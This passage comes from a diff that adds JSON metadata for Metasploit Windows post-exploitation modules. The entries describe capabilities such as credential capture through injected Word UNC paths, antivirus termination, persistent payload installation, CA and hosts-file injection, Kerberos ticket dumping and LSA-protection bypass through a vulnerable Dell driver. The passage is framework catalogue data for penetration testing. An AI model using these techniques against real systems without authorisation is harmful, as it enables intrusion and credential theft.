"check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/wmic_command": { + "name": "Windows Gather Run WMIC Commands", + "fullname": "post/windows/gather/wmic_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module executes WMIC commands on the specified host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": 
null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-23 00:25:13 +0000", + "path": "/modules/post/windows/gather/wmic_command.rb", + "is_install_path": true, + "ref_name": "windows/gather/wmic_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/word_unc_injector": { + "name": "Windows Gather Microsoft Office Word UNC Path Injector", + "fullname": "post/windows/gather/word_unc_injector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "SphaZ " + ], + "description": "This module modifies a remote .docx file that will, upon opening, submit\n stored netNTLM credentials to a remote host. Verified to work with Microsoft\n Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n auxiliary/server/capture/smb module can be used.", + "references": [ + "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/word_unc_injector.rb", + "is_install_path": true, + "ref_name": "windows/gather/word_unc_injector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/add_user": { + "name": "Windows Manage Add User to the Domain and/or to a Domain Group", + "fullname": "post/windows/manage/add_user", + "aliases": [ + "post/windows/manage/add_user_domain" + ], + "rank": 300, + "disclosure_date": null, + "type": "post", 
+ "author": [ + "Joshua Abraham " + ], + "description": "This module adds a user to the Domain and/or to a Domain group. It will\n check if sufficient privileges are present for certain actions and run\n getprivs for system. If you elevated privs to system, the\n SeAssignPrimaryTokenPrivilege will not be assigned. You need to migrate to\n a process that is running as system. If you don't have privs, this script\n exits.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/add_user.rb", + "is_install_path": true, + "ref_name": "windows/manage/add_user", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/archmigrate": { + "name": "Architecture Migrate", + "fullname": "post/windows/manage/archmigrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe (koen.riepe " + ], + "description": "This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a\n new process with the correct architecture and migrates into that process.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/archmigrate.rb", + "is_install_path": true, + "ref_name": "windows/manage/archmigrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + 
"Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/change_password": { + "name": "Windows Manage Change Password", + "fullname": "post/windows/manage/change_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will attempt to change the password of the targeted account.\n The typical usage is to change a newly created account's password on a\n remote host to avoid the error, 'System error 1907 has occurred,' which\n is caused when the account policy enforces a password change before the\n next login.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/change_password.rb", + "is_install_path": true, + "ref_name": "windows/manage/change_password", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/clone_proxy_settings": { + "name": "Windows Manage Proxy Setting Cloner", + "fullname": "post/windows/manage/clone_proxy_settings", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module copies the proxy settings from the current user to the\n targeted user SID, supports remote hosts as well if remote registry\n is allowed.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/windows/manage/clone_proxy_settings.rb", + 
"is_install_path": true, + "ref_name": "windows/manage/clone_proxy_settings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/delete_user": { + "name": "Windows Manage Local User Account Deletion", + "fullname": "post/windows/manage/delete_user", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "chao-mu" + ], + "description": "This module deletes a local user account from the specified server,\n or the local machine if no server is given.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/delete_user.rb", + "is_install_path": true, + "ref_name": "windows/manage/delete_user", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/dell_memory_protect": { + "name": "Dell DBUtilDrv2.sys Memory Protection Modifier", + "fullname": "post/windows/manage/dell_memory_protect", + "aliases": [], + "rank": 0, + "disclosure_date": null, + "type": "post", + "author": [ + "SentinelLabs", + "Kasif Dekel", + "Red Cursor", + "Jacob Baines" + ], + "description": "The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition\n that allows an attacker to read and write arbitrary kernel-mode memory. This module\n installs the provided driver, enables or disables LSA protection on the provided\n PID, and then removes the driver. 
This would allow, for example, dumping LSASS memory\n even when secureboot is enabled or preventing antivirus from accessing the memory of\n a chosen PID.\n\n The affected drivers are not distributed with Metasploit. You will truly need to\n Bring Your Own (Dell) Driver.", + "references": [ + "URL-https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "URL-https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", + "URL-https://itm4n.github.io/lsass-runasppl/", + "URL-https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "URL-https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93", + "URL-https://github.com/RedCursorSecurityConsulting/PPLKiller", + "URL-https://github.com/jbaines-r7/dellicious" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/post/windows/manage/dell_memory_protect.rb", + "is_install_path": true, + "ref_name": "windows/manage/dell_memory_protect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-os-restarts" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/download_exec": { + "name": "Windows Manage Download and/or Execute", + "fullname": "post/windows/manage/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "RageLtMan " + ], + "description": "This module will download a file by importing urlmon via railgun.\n The user may also choose to execute the file with arguments via exec_string.", + "references": [], + 
"platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/download_exec.rb", + "is_install_path": true, + "ref_name": "windows/manage/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/driver_loader": { + "name": "Windows Manage Driver Loader", + "fullname": "post/windows/manage/driver_loader", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module loads a KMD (Kernel Mode Driver) using the Windows Service API.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/driver_loader.rb", + "is_install_path": true, + "ref_name": "windows/manage/driver_loader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-down" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/enable_rdp": { + "name": "Windows Manage Enable Remote Desktop", + "fullname": "post/windows/manage/enable_rdp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module enables the Remote Desktop Service (RDP). 
It provides the options to create\n an account and configure it to be a member of the Local Administrators and\n Remote Desktop Users group. It can also forward the target's port 3389/tcp.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/enable_rdp.rb", + "is_install_path": true, + "ref_name": "windows/manage/enable_rdp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/enable_support_account": { + "name": "Windows Manage Trojanize Support Account", + "fullname": "post/windows/manage/enable_support_account", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "salcho " + ], + "description": "This module enables alternative access to servers and workstations\n by modifying the support account's properties. It will enable\n the account for remote access as the administrator user while\n taking advantage of some weird behavior in lusrmgr.msc. 
It will\n check if sufficient privileges are available for registry operations,\n otherwise it exits.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/enable_support_account.rb", + "is_install_path": true, + "ref_name": "windows/manage/enable_support_account", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/exec_powershell": { + "name": "Windows PowerShell Execution Post Module", + "fullname": "post/windows/manage/exec_powershell", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nicholas Nam (nick ", + "RageLtMan " + ], + "description": "This module will execute a PowerShell script in a meterpreter session.\n The user may also enter text substitutions to be made in memory before execution.\n Setting VERBOSE to true will output both the script prior to execution and the results.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/exec_powershell.rb", + "is_install_path": true, + "ref_name": "windows/manage/exec_powershell", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/execute_dotnet_assembly": { + "name": "Execute .net Assembly (x64 only)", + "fullname": 
"post/windows/manage/execute_dotnet_assembly", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "b4rtik" + ], + "description": "This module executes a .NET assembly in memory. It\n reflectively loads a dll that will host CLR, then it copies\n the assembly to be executed into memory. Credits for AMSI\n bypass to Rastamouse (@_RastaMouse)", + "references": [ + "URL-https://b4rtik.github.io/posts/execute-assembly-via-meterpreter-session/" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb", + "is_install_path": true, + "ref_name": "windows/manage/execute_dotnet_assembly", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/forward_pageant": { + "name": "Forward SSH Agent Requests To Remote Pageant", + "fullname": "post/windows/manage/forward_pageant", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan ", + "Ben Campbell " + ], + "description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. 
This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-23 17:41:20 +0000", + "path": "/modules/post/windows/manage/forward_pageant.rb", + "is_install_path": true, + "ref_name": "windows/manage/forward_pageant", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/hashcarve": { + "name": "Windows Local User Account Hash Carver", + "fullname": "post/windows/manage/hashcarve", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "p3nt4" + ], + "description": "This module will change a local user's password directly in the registry.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/hashcarve.rb", + "is_install_path": true, + "ref_name": "windows/manage/hashcarve", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/ie_proxypac": { + "name": "Windows Manage Proxy PAC File", + 
"fullname": "post/windows/manage/ie_proxypac", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC\n option, a PAC file will be created on the victim host. It's also possible to provide a\n remote PAC file (REMOTE_PAC option) by providing the full URL.", + "references": [ + "URL-https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1", + "URL-http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/ie_proxypac.rb", + "is_install_path": true, + "ref_name": "windows/manage/ie_proxypac", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/inject_ca": { + "name": "Windows Manage Certificate Authority Injection", + "fullname": "post/windows/manage/inject_ca", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module allows the attacker to insert an arbitrary CA certificate\n into the victim's Trusted Root store.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/inject_ca.rb", + "is_install_path": true, + "ref_name": "windows/manage/inject_ca", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" 
+ ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/inject_host": { + "name": "Windows Manage Hosts File Injection", + "fullname": "post/windows/manage/inject_host", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vt " + ], + "description": "This module allows the attacker to insert a new entry into the target\n system's hosts file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/inject_host.rb", + "is_install_path": true, + "ref_name": "windows/manage/inject_host", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/install_python": { + "name": "Install Python for Windows", + "fullname": "post/windows/manage/install_python", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Michael Long " + ], + "description": "This module places an embeddable Python3 distribution onto the target file system,\n granting pentesters access to a lightweight Python interpreter.\n This module does not require administrative privileges or user interaction with\n installation prompts.", + "references": [ + "URL-https://docs.python.org/3/using/windows.html#windows-embeddable", + "URL-https://attack.mitre.org/techniques/T1064/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": 
"/modules/post/windows/manage/install_python.rb", + "is_install_path": true, + "ref_name": "windows/manage/install_python", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/install_ssh": { + "name": "Install OpenSSH for Windows", + "fullname": "post/windows/manage/install_ssh", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Michael Long " + ], + "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.", + "references": [ + "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview", + "URL-https://github.com/PowerShell/openssh-portable" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/install_ssh.rb", + "is_install_path": true, + "ref_name": "windows/manage/install_ssh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/kerberos_tickets": { + "name": "Kerberos Ticket Management", + "fullname": "post/windows/manage/kerberos_tickets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Will Schroeder", + "Spencer McIntyre" + ], + 
"description": "Manage kerberos tickets on a compromised host.", + "references": [ + "URL-https://github.com/GhostPack/Rubeus", + "URL-https://github.com/wavvs/nanorobeus" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/manage/kerberos_tickets.rb", + "is_install_path": true, + "ref_name": "windows/manage/kerberos_tickets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "DUMP_TICKETS", + "description": "Dump the Kerberos tickets" + }, + { + "name": "ENUM_LUIDS", + "description": "Enumerate session logon LUIDs" + }, + { + "name": "SHOW_LUID", + "description": "Show the current LUID" + } + ] + }, + "post_windows/manage/killav": { + "name": "Windows Post Kill Antivirus and Hips", + "fullname": "post/windows/manage/killav", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Marc-Andre Meloche (MadmanTM)", + "Nikhil Mittal (Samratashok)", + "Jerome Athias", + "OJ Reeves" + ], + "description": "This module attempts to locate and terminate any processes that are identified\n as being Antivirus or Host-based IPS related.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/windows/manage/killav.rb", + "is_install_path": true, + "ref_name": "windows/manage/killav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "os-resource-loss" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + 
"shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/make_token": { + "name": "Make Token Command", + "fullname": "post/windows/manage/make_token", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Daniel López Jiménez (attl4s)", + "Simone Salucci (saim1z)" + ], + "description": "In its default configuration, this module creates a new network security context with the specified\n logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and\n a new logon session is created and linked to that token. The token is then impersonated to acquire\n the new network security context. This module has no effect on local actions - only on remote ones\n (where the specified credential material will be used). This module does not validate the credentials\n specified.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-06 09:07:57 +0000", + "path": "/modules/post/windows/manage/make_token.rb", + "is_install_path": true, + "ref_name": "windows/manage/make_token", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "make_token", + "maketoken" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/migrate": { + "name": "Windows Manage Process Migration", + "fullname": "post/windows/manage/migrate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "phra " + ], + "description": "This module will migrate a Meterpreter session from one process\n to another. 
A given process PID to migrate to or the module can spawn one and\n migrate to that newly spawned process.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/migrate.rb", + "is_install_path": true, + "ref_name": "windows/manage/migrate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/mssql_local_auth_bypass": { + "name": "Windows Manage Local Microsoft SQL Server Authorization Bypass", + "fullname": "post/windows/manage/mssql_local_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Scott Sutherland " + ], + "description": "When this module is executed, it can be used to add a sysadmin to local\n SQL Server instances. It first attempts to gain LocalSystem privileges\n using the \"getsystem\" escalation methods. If those privileges are not\n sufficient to add a sysadmin, then it will migrate to the SQL Server\n service process associated with the target instance. The sysadmin\n login is added to the local SQL Server using native SQL clients and\n stored procedures. If no instance is specified then the first identified\n instance will be used.\n\n Why is this possible? By default in SQL Server 2k-2k8, LocalSystem\n is assigned syadmin privileges. 
Microsoft changed the default in\n SQL Server 2012 so that LocalSystem no longer has sysadmin privileges.\n However, this can be overcome by migrating to the SQL Server process.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb", + "is_install_path": true, + "ref_name": "windows/manage/mssql_local_auth_bypass", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/multi_meterpreter_inject": { + "name": "Windows Manage Inject in Memory Multiple Payloads", + "fullname": "post/windows/manage/multi_meterpreter_inject", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "David Kennedy \"ReL1K\" " + ], + "description": "This module will inject into several processes a given\n payload and connect to a given list of IP addresses.\n The module works with a given lists of IP addresses and\n process IDs if no PID is given it will start the given\n process in the advanced options and inject the selected\n payload into the memory of the created module.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb", + "is_install_path": true, + "ref_name": "windows/manage/multi_meterpreter_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] 
+ }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/nbd_server": { + "name": "Windows Manage Local NBD Server for Remote Disks", + "fullname": "post/windows/manage/nbd_server", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "Maps remote disks and logical volumes to a local Network Block\n Device server. Allows for forensic tools to be executed on the remote disk directly.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/nbd_server.rb", + "is_install_path": true, + "ref_name": "windows/manage/nbd_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/peinjector": { + "name": "Peinjector", + "fullname": "post/windows/manage/peinjector", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Maximiliano Tedesco " + ], + "description": "This module will inject a specified windows payload into a target executable.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/peinjector.rb", + "is_install_path": true, + "ref_name": "windows/manage/peinjector", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + 
"needs_cleanup": null, + "actions": [] + }, + "post_windows/manage/persistence_exe": { + "name": "Windows Manage Persistent EXE Payload Installer", + "fullname": "post/windows/manage/persistence_exe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Merlyn drforbin Cousins " + ], + "description": "This module will upload an executable to a remote host and make it Persistent.\n It can be installed as USER, SYSTEM, or SERVICE. USER will start on user login,\n SYSTEM will start on system boot but requires privs. SERVICE will create a new service\n which will start the payload. Again requires privs.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/manage/persistence_exe.rb", + "is_install_path": true, + "ref_name": "windows/manage/persistence_exe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + 